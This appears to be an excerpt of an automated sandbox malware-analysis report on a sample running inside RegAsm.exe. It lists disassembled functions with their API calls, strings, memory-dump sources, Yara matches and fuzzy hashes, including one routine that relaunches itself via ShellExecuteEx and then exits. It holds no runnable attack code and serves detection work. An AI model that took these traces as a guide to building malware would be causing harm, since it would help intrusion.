Function 6C2F46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C2F4721

Part of subcall function 6C2A4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C2E3EBD,00000017,?,00000000,?,6C2E3EBD,?,?,6C2A42D2), ref: 6C2A4444

Strings

-%llu, xrefs: 6C2F4733
., xrefs: 6C2F476A
profiler-paused, xrefs: 6C2F46E4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: ba77bee6b1d7a6e660ee13ab5e9bfbfbf84355e75674c27cf6a1f2568e4acc20
Instruction ID: 182ed3b6d431d4363713a055685d45829ee6372b85e29298e9241ff5ee8a6331
Opcode Fuzzy Hash: ba77bee6b1d7a6e660ee13ab5e9bfbfbf84355e75674c27cf6a1f2568e4acc20
Instruction Fuzzy Hash: 0A311475F0420C4BDB08CF6CD99169EBBE69B88314F15823EED159BB41EBB499058B90

Function 6C2FB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2E3EBD,6C2E3EBD,00000000), ref: 6C2A42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C2FB127), ref: 6C2FB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2FB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C2FB4E4

Strings

pid:, xrefs: 6C2FB4DE

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 37be2dfe18b4bb43fe432e10df466ca40af974f58583724ffac35901b26dad48
Instruction ID: b4e1a345b903fe9307083828a746b6bc77b9cdd311399f09058447accd81e293
Opcode Fuzzy Hash: 37be2dfe18b4bb43fe432e10df466ca40af974f58583724ffac35901b26dad48
Instruction Fuzzy Hash: 09312231A4120DCBDB00DFA9D990AEEF7B9FF04308F540529EC61A7A41D771E84ACBA1

Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00416726
ExitProcess.KERNEL32 ref: 00416755

Strings

<, xrefs: 004166D9

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 59ead0d7e25924aef004ea7918618779fbfb4a9f4f012c75c7c01a358e8d0a9d
Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
Opcode Fuzzy Hash: 59ead0d7e25924aef004ea7918618779fbfb4a9f4f012c75c7c01a358e8d0a9d
Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A

Function 6C2BBF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C307A3F), ref: 6C2BBF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C307A3F), ref: 6C2BBF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C307A3F), ref: 6C2BBF7E

Strings

1l, xrefs: 6C2BBF84

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: 1l
API String ID: 4279176481-371518933
Opcode ID: 577003afd96162d76814c8cacf689e144b1b6eb62dd9737866009c15d8e4761b
Instruction ID: 7da3c018bb82a6289f9143a47125c23b8e2a54982b6e9bfaf5bc096fce1e331f
Opcode Fuzzy Hash: 577003afd96162d76814c8cacf689e144b1b6eb62dd9737866009c15d8e4761b
Instruction Fuzzy Hash: 9C11BF792047048FC729CF0CD599966FBF8FB5A308355885DEA8A8BB50C732E800CF90

Function 6C2AF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C31D020), ref: 6C2AF122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C2AF132

Strings

shell32, xrefs: 6C2AF11D
SHGetKnownFolderPath, xrefs: 6C2AF12C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 570262c16eb2f7b1ffc89053d57b2650cd819a0b31879ce754a5f57e76301ee9
Instruction ID: 4bf05a3483a05f5c68f5bf9c03b86d31079ca2461a8a58371c2b53ad79d8e200
Opcode Fuzzy Hash: 570262c16eb2f7b1ffc89053d57b2650cd819a0b31879ce754a5f57e76301ee9
Instruction Fuzzy Hash: CF015E71B0121A9BCF108F69DD58A9B7BBCFF4A755B50041CFC49D7200D738AA04CBA0

Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041A972
lstrcatA.KERNEL32(00000000), ref: 0041A982

Strings

vI@, xrefs: 0041A937
vI@, xrefs: 0041A929

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: vI@$vI@
API String ID: 3905823039-1245421781
Opcode ID: 3ea695b73edd8d98e36b7eab2f8d63ce422a58f28ac802970baeffa819a47fc3
Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
Opcode Fuzzy Hash: 3ea695b73edd8d98e36b7eab2f8d63ce422a58f28ac802970baeffa819a47fc3
Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95

Function 6C2EE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2EE577
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE584
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2EE8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C2EE5A1, 6C2EE5CC, 6C2EE5FF, 6C2EE62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C2EE777
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C2EE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C2EE826, 6C2EE850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C2EE722, 6C2EE750, 6C2EE7A2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 95de3c075efc9a42804f1523c4d8b4386c31ff5e148b6a5778f0790aa43d2a8e
Instruction ID: a452313d7fcad2ed71c5ae284fbfa0ecb785987c3c2886c59e19deee396b7ca3
Opcode Fuzzy Hash: 95de3c075efc9a42804f1523c4d8b4386c31ff5e148b6a5778f0790aa43d2a8e
Instruction Fuzzy Hash: DE118B31A04268DFCF009F19C848AAABBB8FB89729F51061DE8465B650C7B8A805CF91

Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
wsprintfW.USER32 ref: 00418D78

Strings

%hs, xrefs: 00418D6F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96

Function 6C2B2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C2B237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C2B2B9C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 012eecc3ed482f02632668da39166ff833e6a35513e7ebc5238c96ffa728e2ff
Instruction ID: 0301fa2822ab6de30d320457b112c8a28e06cec88f76ff69794fdd5c1339d664
Opcode Fuzzy Hash: 012eecc3ed482f02632668da39166ff833e6a35513e7ebc5238c96ffa728e2ff
Instruction Fuzzy Hash: EEE160B1A0030A8FDB18CF59C894B9EB7B2BF88358F198168ED056B745D771EC85CB90

Function 6C2F0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2F0CD5

Part of subcall function 6C2DF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2DF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2F0D40
free.MOZGLUE ref: 6C2F0DCB

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

free.MOZGLUE ref: 6C2F0DDD
free.MOZGLUE ref: 6C2F0DF2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: ea010f120f3cd12b1f1aed4400b0f60e82865840094242d6071ae7265a32100b
Instruction ID: 0a1694586b87f5c6975ba4655359b395499be565d0ae84aaa033a3dfe1ad38bc
Opcode Fuzzy Hash: ea010f120f3cd12b1f1aed4400b0f60e82865840094242d6071ae7265a32100b
Instruction Fuzzy Hash: 7C413675A587889BD720CF29C08079AFBE5FFC9714F118A2EE8E887711D770A445CB92

Function 6C2F9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C2F8242,?,00000000,?,6C2EB63F), ref: 6C2F9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C2F8242,?,00000000,?,6C2EB63F), ref: 6C2F91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C2F8242,?,00000000,?,6C2EB63F), ref: 6C2F91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C2F8242,?,00000000,?,6C2EB63F), ref: 6C2F9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C2F8242,?,00000000,?,6C2EB63F), ref: 6C2F9219

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 334e40c54e34b0d68f044a428b12ed60e56f68f417edfab9cb094d010e787871
Instruction ID: 1c4703cfe88a042c7db5b25a7eee293910f32525ace5efe292d1184ed10524c4
Opcode Fuzzy Hash: 334e40c54e34b0d68f044a428b12ed60e56f68f417edfab9cb094d010e787871
Instruction Fuzzy Hash: BF313831A4060E8FEB00EF6CDC4475AB3E9EF81315F518639D866D7640EB31D46ACBA1

Function 6C2E0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E7DC), ref: 6C2E0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C2E084C
EnterCriticalSection.KERNEL32(?), ref: 6C2E08AF
LeaveCriticalSection.KERNEL32(?), ref: 6C2E08BD
LeaveCriticalSection.KERNEL32(6C32E7DC), ref: 6C2E08D5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 1494a7262d6b7fb14fbd93e0ed8d75348527970e891fbe2cf05611f88038eff4
Instruction ID: b251da58d914d26ea657cc6c3c94f7e6f1b75d37d0fc3393b1a71f6e545bf1b9
Opcode Fuzzy Hash: 1494a7262d6b7fb14fbd93e0ed8d75348527970e891fbe2cf05611f88038eff4
Instruction Fuzzy Hash: 18217131B0524E9BDF04CFA9D845BEA7779BF4970AF90052CE909B7A40DF39A9058BD0

Function 6C2FCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FCDA4

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

Part of subcall function 6C2FD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C2FCDBA,00100000,?,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FD158
Part of subcall function 6C2FD130: InitializeConditionVariable.KERNEL32(00000098,?,6C2FCDBA,00100000,?,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FCDC4

Part of subcall function 6C2F7480: ReleaseSRWLockExclusive.KERNEL32(?,6C3015FC,?,?,?,?,6C3015FC,?), ref: 6C2F74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FCECC

Part of subcall function 6C2BCA10: mozalloc_abort.MOZGLUE(?), ref: 6C2BCAA2

Part of subcall function 6C2ECB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C2FCEEA,?,?,?,?,00000000,?,6C2EDA31,00100000,?,?,00000000), ref: 6C2ECB57
Part of subcall function 6C2ECB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C2ECBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C2FCEEA,?,?), ref: 6C2ECBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C2EDA31,00100000,?,?,00000000,?), ref: 6C2FD058

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 624b3a4bdb207ee74d2c60cb6a9b6a16c2c8da6e23c8afb5858ee500b81038a6
Instruction ID: abc909d7a45a391200728880cf59309ba178af4714806219863f5412f0593a13
Opcode Fuzzy Hash: 624b3a4bdb207ee74d2c60cb6a9b6a16c2c8da6e23c8afb5858ee500b81038a6
Instruction Fuzzy Hash: 26D16F71A04B4A9FD719CF28C480B99F7E1BF89308F01872DD86987711EB71E9A5CB81

Function 6C2B1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C2B17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C2B18EE
free.MOZGLUE(?), ref: 6C2B1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2B194C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

